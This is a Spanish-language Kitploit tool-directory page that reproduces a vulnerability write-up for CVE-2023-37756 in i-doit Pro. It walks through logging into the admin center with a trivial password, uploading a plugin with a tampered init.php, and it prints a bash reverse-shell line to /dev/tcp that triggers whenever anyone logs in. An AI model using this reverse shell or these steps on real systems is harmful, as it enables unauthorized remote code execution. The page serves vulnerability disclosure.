Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below | Kitploit
Herramientas/GitHubGitHub/leekenghwa/cve-2023-37756-cwe-521-lead-to-malicious-plugin-upload-in-the-i-doit-pro-25-and-below
Ataques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebMala ConfiguraciónDesarrollo de Payloads
GitHubleekenghwa/cve-2023-37756-cwe-521-lead-to-malicious-plugin-upload-in-the-i-doit-pro-25-and-below

CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 2 añosAún no revisado

CVE-2023-37756 – Requisito de contraseña débil en admin-center conduce a la carga de un plugin malicioso en i-doit Pro 25 y anteriores

i-doit Pro 25 y anteriores son vulnerables a una vulnerabilidad de requisito de contraseña débil en admin-center + la carga de un plugin malicioso conduce a una vulnerabilidad de RCE. Estas vulnerabilidades podrían permitir a un atacante realizar fácilmente fuerza bruta o adivinar contraseñas para obtener acceso al admin-center y cargar un plugin malicioso para lograr la ejecución remota de código.

Descripción del producto: i-doit es una herramienta web de código abierto para la documentación de TI y CMDB (Base de Datos de Gestión de Configuración) desarrollada por synetics GmbH. i-doit Pro es la versión comercial del software y requiere una licencia de pago. Incluye funciones adicionales, soporte profesional y actualizaciones y mejoras periódicas. Los usuarios deben comprar una licencia para usar i-doit Pro, y el coste varía según el número de usuarios y las funciones requeridas.

Descripción de la vulnerabilidad: encontramos que esta aplicación web tiene un requisito de contraseña débil en la creación de cuentas del admin-center; el propietario de la aplicación incluso puede establecer una contraseña mínima de 1 carácter con el nombre de usuario predeterminado “admin”. Esto podría permitir a un atacante realizar fácilmente fuerza bruta o adivinar la contraseña para obtener acceso al admin-center y cargar un plugin malicioso para lograr la ejecución remota de código.

Página web afectada: página de inicio de sesión del admin-center + instalación del plugin

Parámetro y componente afectados : página de inicio de sesión del admin-center + instalación del plugin

Paso 1 : como no hay requisitos de contraseña ni complejidad de contraseña implementados en la creación de cuentas del admin-center, podemos empezar con fuerza bruta. La siguiente captura de pantalla muestra que podemos iniciar sesión con el nombre de usuario “admin” y la contraseña “1”

Password_1_login_result

step2

Paso 2 : navegue hasta la pestaña Add-on y elija 'upload'

step3

Paso 3 : hay algunos requisitos, como que package.json debe existir, y descubrimos que el objetivo ha implementado async para comprobar todas las clases y funciones. Pero podemos descargar un plugin adecuado desde su portal de clientes y editar / añadir en el init.php; esta es la forma más segura de evitar que el sistema se bloquee al activar el payload. Nota: coloque & al final de la línea para evitar que el sistema se bloquee después de que se active el payload, e init.php es el mejor lugar para inyectar el payload. Ejemplo : exec ("/bin/bash -c 'bash -i >& /dev/tcp/IP/Port 0>&1 &'");

step4

step5

step6

Nota : recuerde volver a comprimirlo en zip y subirlo.

step7

step8

Nota : haga clic en Install y luego active el Add-on seleccionado.

step9

Nota: su payload se activará cuando alguien inicie sesión, puede ser cualquier persona.

final

Descargar herramienta